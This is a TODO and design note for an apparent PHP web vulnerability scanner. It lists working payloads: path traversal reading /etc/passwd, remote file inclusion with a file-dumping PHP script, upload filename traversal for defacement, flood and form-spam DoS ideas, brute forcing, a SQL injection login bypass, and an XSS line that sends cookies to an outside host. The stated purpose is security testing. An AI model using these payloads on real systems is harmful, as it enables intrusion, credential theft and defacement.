Location: PHPKode > projects > WebSecurityTester > php-gtk/security/TODO.txt
WST Project

Name: Web Security Tester
Version: 1.0b
License: GNU/GPL - http://www.gnu.org/copyleft/gpl.html
Status: Under development
Authors: Simone Cosci <hide@address.com>, Mauro Casciari <hide@address.com>
Package-Type: Library and Application
Language: PHP4 
Extensions: mime_magic, domxml
Description: Test the security level of web applications
Objectives: Find possible system vulnerabilty using http protocol
Libraries:
	HttpRequest.cls.php
	HttpResponse.cls.php
	HtmlParser.cls.php
	HtmlFormParser.cls.php
	CssParser.cls.php
Utilty:
	FileSystem.lib.php
	String.lib.php

Interfaces: web/ gtk/ cmd/

	Web: http://wst/web/index.php
	Gtk: $ php gtk/wst.php
	Cmd: $ php cmd/wst.php -p=80 -h=www.host.com -s=192.168.1.100 -m=GET -t=/index.php 


TODO:
*1) Configure the first HttpRequest
*2) Parse the HttpResponse to catch headers and HTML
~3) Parse HTML to find relevant elements such as forms, images, links, scripts
4) Test each element by generating attack scripts like DoS, Floods, BruteForcers, Trasversals, SQL injectors, Cross Site Scripts
5) Pluggables and configurables external exploits

		Images or files vulnarables can be detected in strings like these:
			action=["'][path]["']
			href=["'][path]["']
			src=["'][path]["']
			background=["'][path]["']
			url(["'][path]["'])
			@import ["'][path]["']
			window.open(["'][path]["']...)
			location=["'][path]["']...
			every ["']http://[piece_1]/[piece_n]["']
			every ["']/[piece_1]/[piece_n]["']

We can try detect:

	DirectoryListing:
		Each path (relative or absolute) have to be processed
		each folder, composing the path, have to be scanned for DirectoryListing, default HTML, robots.txt ecc..
		and restart the process using target=this.folder
	Linked: 
		Processing html we can find many different and interesting informations.
		For Images or files over 100Kb we can generate scripts for DoS attacks.
		Like continuous GET filename.jpg?t="+time()+rand(0,1000) (google don't permit it ! -> 404)
		For path that includes GET parameters we can suppose many things:
		Ex. if the server is Apache on a Linux machine is used put all vhosts in
			/var/www/
			/var/www/htdocs/
			/var/www/html/
			/home/hosts/
			...
		Supposing that: one of the parameters sent by href or GET like script.ext?param1=value1&param2=value2
		is used to read someting on filesystem in an instruction like readfile(param1) or include(param1)
		we can try to build different path to get important informations es.
			script.ext?param1=../../../etc/passwd&param2=../../../etc/passwd
			script.ext?param1=../../../../etc/passwd&param2=../../../../etc/passwd
			script.ext?param1=../../../../../etc/passwd&param2=../../../../../etc/passwd
		or to include our remote script.inc with a GET like this: script.ext?param1=http://me.supereva.it/script.inc
			<?php
			$files = array(
					'etc/passwd',
					'etc/httpd/httpd.conf',
					'etc/apache/apache.conf',
					...
			);
			foreach ($files as $file){
				for($i=1;$i<10;$i++){
					$path = str_repeat('../',$i).$file;
					if(file_exists($path)){
						echo "-------------------------------------------------\r\n";
						$fp=fopen($path,'rb');
						$c=fread($fp,filesize($path));
						fclose($fp);
						echo $c;
					}
				}
			}
			exit;
			?>

	Forms:
		Forms are very important. 
		Expecially forms with enctype="multipart/form-data" that accept file uploads
		We can try to Upload files like script.inc spoofing the content-type 
		or renaming the file like ../../../../../etc/passwd or ../../../index.php
		to see if moving the file in a folder like /user_images/foo/$image_name will produce /user_images/foo/../../../index.php
		overwriting the actual index.php for defacing or grab infos.

		In forms like registrations or subscriptions that don't have a randomimage-system for non robots,
		we can generate a robot that send random infos to the form-action script until the database will finish the partition space.
		Same thing is valid for contact forms that send emails to a mail-server that have a limit space too.

		Login forms can be brute-forced with scripts that have dictionaries 
		and that can send the requested vars, in the correct method, from the spoofed referer ;-)
		analizing the answer until a specific string is no more found (Ex. "Invalid user or password")
		SQL-Injections are also great tests for vulnerability, and in login forms we are sure the the values we POST will be insert in an SQL query. 
		Username=""; Password="' OR 1=1--"

		In forms like comments that probably will be readed from an administrator we can suppose that will be displayed in a web page.
		So, if the administrator views the comments rendered on the html page we can think to send an small image like this:
		$comment = "Hello! Nice site.<script>document.write('<img src=\"http://myhost/getcoockie.php?cookie='+document.cookie+'\" width=1 height=1 border=0>')</script>";
		or if the comments are readed inside a textarea or whatever html control:
		$comment = "Hello! Nice site.</whatever><script>document.write('<img src=\"http://myhost/getcoockie.php?cookie='+document.cookie+'\" width=1 height=1 border=0>')</script>";

Usefull for:

	SystemAdministrators: Test the vulnerabilty for DoS, BruteForcing ecc...
	Sofware developers: Check how the application react when send http request, read response, modify, re-send http request
	... tampering data in some how. Check the vunerability of SQL injections, XSS, remote code execution ecc...
PHPKode Newsletter X is easy to install and configure on the most servers. Try now!
Return current item: WebSecurityTester